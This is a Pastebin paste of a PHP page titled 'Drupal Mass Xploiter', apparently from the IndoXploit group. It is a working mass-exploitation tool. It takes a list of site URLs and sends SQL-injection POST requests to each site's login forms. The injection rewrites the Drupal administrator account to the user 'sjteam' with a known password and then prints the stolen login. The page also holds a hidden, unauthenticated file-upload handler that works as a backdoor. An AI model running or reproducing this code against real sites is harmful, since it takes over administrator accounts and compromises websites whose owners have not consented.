AgusSR

Drupal Mass Xploiter

Dec 14th, 2015
775
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  <!Doctype HTML>
  2. <html>
  3. <head>
  4.     <title>Drupal Exploit</title>
  5.     <style type="text/css">
  6.     .mymargin{
  7.         margin-top:30px;
  8.         font-family: monospace;
  9.     }
  10.     body, html {
  11.         background-color:black;
  12.         text-align: center;
  13.         color: #008000;
  14.         margin: 10px auto;
  15.     }
  16.     a {
  17.     color: lime;
  18.     text-decoration: none;
  19. }
  20.     </style>
  21. </head>
  22. <body>
  23. <center>
  24.     <div class="mymargin">
  25.         <center>
  26.             <form method="POST" action="">
  27.         <font color='#008000'>WebSite :</font> <br>
  28.         <textarea name="url" placeholder="Example: www.site.com" style="resize: none; border: 1px solid #008000; color: #bb0000; background: transparent; margin: 5px auto; padding-left: 5px; width: 500px; height: 250px;"></textarea><br>
  29.         <input style="border: 1px solid #008000; color: #bb0000; background: transparent; margin: 5px; width: 350px; height: 25px;" size="50" type="submit" name="submit" value="Attack">
  30.     </form>
  31.     <br>
  32. <?php
  33. /* Tools ini Dibuat oleh Mr. Error 404 | IndoXploit - Sanjungan Jiwa
  34. Segala bentuk copy paste harap tidak mengubah copyright asli - hak cipta 2015 IndoXploit - Sanjungan Jiwa
  35. Hargailah karya sang pencipta ^_^
  36. Salam hangat IndoXploit Coders Team
  37. Karya Asli anak Bangsa !!!
  38. */
  39. error_reporting(0);
  40. $submit = $_POST['submit'];
  41. $url = explode("\r\n", $_POST['url']);
  42. if($submit) {
  43.     foreach($url as $sites) {
  44.     $log = "/user/login";
  45.     $holako = "/?q=user";
  46.     $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  47.     $params = array(
  48.         'http' => array(
  49.         'method' => 'POST',
  50.         'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  51.         'content' => $post_data
  52.         )
  53.     );
  54.     $ctx = stream_context_create($params);
  55.     $data = file_get_contents($sites . '/user/login/', null, $ctx);
  56.     echo "<u>Testing user/login</u><br>";
  57.     if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  58.         echo "Scanning: <font color=lime>$sites</font><br>";
  59.         echo "Status: Successfully Xploited!<br>";
  60.         echo "Data=> user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
  61.         echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
  62.     } else {
  63.         echo "Scanning: <font color=lime>$sites</font><br>";
  64.         echo "Status: <font color=red>Not Xploited!</font><br><br>";
  65.     }
  66. }
  67. }
  68. if($submit) {
  69.     foreach($url as $sites) {
  70.     $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  71.     $params = array(
  72.         'http' => array(
  73.         'method' => 'POST',
  74.         'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  75.         'content' => $post_data
  76.         )
  77.     );
  78.     $ctx = stream_context_create($params);
  79.     $data = file_get_contents($sites . '?q=node&destination=node', null, $ctx);
  80.     echo '<u>Testing at Index</u><br>';
  81.     if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  82.         echo "Scanning: <font color=lime>$sites</font><br>";
  83.         echo "Status: Successfully Xploited!<br>";
  84.         echo "Data => user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
  85.         echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
  86.     } else {
  87.         echo "Scanning: <font color=lime>$sites</font><br>";
  88.         echo "Status: <font color=red>Not Xploited!</font><br><br>";
  89.     }
  90. }
  91. }
  92. ?>
  93.     </div>
  94. <?php
  95.  
  96. $Drupal  = $_POST['Drupal'];
  97.  
  98.  
  99. if($Drupal == 'Drupal') {
  100.  
  101. $filename = $_FILES['file']['name'];
  102. $filetmp  = $_FILES['file']['tmp_name'];
  103.  
  104. echo "<form method='POST' enctype='multipart/form-data'>
  105.   <input type='file'name='file' />
  106.   <input type='submit' value='go' />
  107.  
  108. </form>";
  109. move_uploaded_file($filetmp,$filename);
  110. }
  111. ?>
  112. </body>
  113. </html>
RAW Paste Data